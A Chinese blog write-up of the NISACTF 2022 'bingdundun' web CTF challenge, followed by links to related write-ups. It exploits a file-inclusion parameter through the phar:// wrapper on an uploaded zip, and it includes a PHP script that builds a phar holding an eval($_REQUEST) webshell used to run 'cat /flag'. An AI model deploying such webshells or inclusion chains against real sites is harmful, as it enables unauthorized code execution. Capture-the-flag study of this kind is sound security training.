[NISACTF 2022]bingdundun

已于 2022-11-07 15:20:46 修改
阅读量1.8k 收藏 2
点赞数 1
分类专栏: CTF WEB 文章标签: 安全 web安全
于 2022-10-19 13:57:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jhk8698/article/details/127406643
版权
CTF 同时被 2 个专栏收录
2 篇文章 0 订阅
订阅专栏
WEB
2 篇文章 0 订阅
订阅专栏
本文详细描述了一次利用PHP文件上传和文件包含漏洞进行攻击的过程。作者首先发现了一个URL参数可以改变,尝试注入后成功触发了文件包含。接着,通过创建包含PHP代码的ZIP文件并利用phar协议,成功执行了代码,获取了flag。文章提供了两种不同的方法来获取flag,并介绍了如何构造和利用phar文件。整个过程展示了Web安全中常见的文件上传漏洞利用技巧。
摘要由CSDN通过智能技术生成

1. 进入靶场环境,提示upload,应该是一个文件上传与文件包含相关的题目。

2. 点击upload进入文件上传页面。看到url有一个bingdundun的get传参,我们尝试传入其他值尝试一下。

3. 尝试传入index,发现index页面的内容被大量包含进来,并且会自动在后面添加.php

4. 在看文件上传点提示可以传图片或压缩包,因此考虑php伪协议中的phar协议或zip协议。首先写一个phpinfo()脚本,打成zip压缩包并上传,上传成功后利用phar协议包含压缩包中的脚本文件,发现脚本中的php代码被成功包含进来并被当作代码执行了。

获取flag方法

方法一:

利用phar协议读取上传一句话木马,用菜刀链接。

http://1.14.71.254:28884/?bingdundun=phar://23de81832e6ba264115a6192202105f7.zip/reqma

方法二:

构造phar文件,phar文件包含我们想要执行的代码,由于index页面提示,flag就在根目录下,因此如果能直接执行cat /flag 就能出结果了。

构造phar文件方法

  1. 修改php.ini 让phar.readonly 改成off。
  2. 创建一个pharfile.php文件,代码如下,用于生成phar包
<?php
$phar = new Phar("exp.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->addFromString("pharfile.php", '<?php eval($_REQUEST["ps"]);?>');
$phar->stopBuffering();
?>

3. 浏览器访问该文件,在同目录下会生成exp.phar文件。复制一份改成zip格式,然后上传

4. phar://协议将文件包含到当前页面,然后给ps参数传入想要执行的代码值,执行成功。

5. 根据代码提示flag在根目录下,因此构造url得到flag。

堃啊方方土
关注
专栏目录
[NISACTF 2022]hardsql - quine注入
oZuoShen123的博客
10-05 665
题目描述:`$password=$_POST['passwd']; $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";` 从描述看出是quine注入,且用户名要是bilala 1、经测试,参数为:username=&passwd=&login=登录,username必须为bilala 2、【= and 空格】被过滤【like or /**/】 3、参考文章:https://blog.csdn.ne
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
[NISACTF 2022]bingdundun~
m0_73612768的博客
01-05 873
用 phar 伪协议进行文件包含;
[NISACTF 2022]
snowlyzz的博客
09-09 6257
NISACTF部分WP
NISACTF 2022 MISC 部分WP
qq_51447967的博客
04-28 2361
[NISACTF 2022]bilala的二维码 题目提示如下 bilala说,里面会不会还藏着什么东西呢,图片分辨率好像有用诶,压缩包密码好像和战队名字相关 下载得到一张缺少定位符号的二维码,手动补全,然后扫描。 扫描得到一个URL,如下 https://video.gz2.com.cn/h666G/h666G_kzwIVy 进去下载得到一张图片,如下 对图片进行分析 可以看到第一张图片后面又附加了一张图片,然后第二张图片后面有个压缩包,全部提取出来。 看了下图片没有发现什么,然后去分析压
关于[NISACTF 2022]babyserialize详解
weixin_57222016的博客
05-06 2496
前言 先甩出PHP的魔术方法。 __invoke():当尝试以调用函数的方式调用对象的时候,就会调用该方法 __construst():具有构造函数的类在创建新对象的时候,回调此方法 __destruct():反序列化的时候,或者对象销毁的时候调用 __wakeup():反序列化的时候调用 __sleep():序列化的时候调用 __toString():把类当成字符串的时候调用,一般在echo处生效 __set():在给不可访问的(protected或者private)或者不存在的属性赋的时候,会被调用
[NISACTF 2022]bingdundun wp
Leaf_initial的博客
04-14 526
这里大部分人可能会报错,这个错误信息表示在运行phar.php文件时,创建归档文件“exp.phar”的功能被禁用了。由于我一直报错,不能生成文件,改了也没有用,所以找到了第二种解决办法,在php文件的目录下打开cmd,然后命令行输入。(但是不知道为什么我的phpinfo信息不能显示,于是重新上传了一个,变量名改了一下,改成了8,就可以了)可以看到example.phar压缩文件有phar.php文件,里面有一个php代码,内容是一句话木马。连接成功,在根目录的flag文件找到了flag,结束。
CTF实验:web安全命令执行
floyd_art的博客
04-12 1680
命令执行漏洞介绍 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP的system、exec、shell_exec等,当用户可以控制命令执行函数的参数时,将可以注入恶意系统命令到正常命令,造成命令执行攻击。   调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行,又没有过滤用户的输入的情况下,就会造成命令执行漏洞。 信息探测 ...
ctf没有cat等程序等情况下读取flag
fjh1997的博客
07-25 898
tcsh 读10行 echo '@ num = 10\nwhile ( $num > 1 )\n set word = "$<"\n echo "$word"\n @ num -= 1\n # rest of code...\nend\n' > /b.sh && source /b.sh < /etc/ctf/flag.txt bash echo $(</etc/ctf/flag.txt)
文件包含漏洞详解
m0_55854679的博客
03-12 1万+
文章目录File Inclusion(文件包含)概述漏洞产生原因漏洞特点注小知识文件包含函数includerequireinclude_oncerequire_once文件包含示例pikachu靶场本地文件包含漏洞演示pikachu靶场远程文件包含漏洞演示文件包含漏洞的利用PHP伪协议(文件包含漏洞常用的利用方法)文件包含漏洞的防范措施phpMyadmin靶场练习 File Inclusion(文件包含)概述 文件包含,是一个功能。在各种开发语言都提供了内置的文件包含函数,其可以使开发人员在一个代码文件
一文掌握CTFPython全部考点
最新发布
黑战士的博客
07-22 1818
pyc文件是py文件编译后生成的字节码文件(byte code),pyc文件经过python解释器最终会生成机器码运行。因此pyc文件是可以跨平台部署的,类似Java的.class文件,一般py文件改变后,都会重新生成pyc文件。
CTF夺旗 服务安全FTP服务
qq_43613772的博客
06-05 854
FTB的简介: FTP 是File Transfer Protocol(文件传输协议)的英文简称,而文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当,用户经常遇到两个概念:“下载”(Download)和"上传"(Uploa...
WebNISACTF 2022 个人复现
uuzeray的博客
12-01 330
明天就新生赛了,练套题保持下手感吧(文章只选取了一部分)
对510cms进行渗透测试,找到其的3个flag
Alashan12的博客
04-08 4622
拿到网站 简单观察后发现url区域存在传参 简单测试找到存在注入的界面(此网站多处网址存在注入) 这里我们通过输入一个单引号找到“企业介绍”—>“企业文化”界面存在注入 我们针对此界面(180.76.226.182/about.php?listid=6)使用sqlmap进行爆破 sqlmap -u 180.76.226.182/about.php?listid=6 --current-db 爆当前数据库名 得到数据库名为“510cms” 然后指定该数据库...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值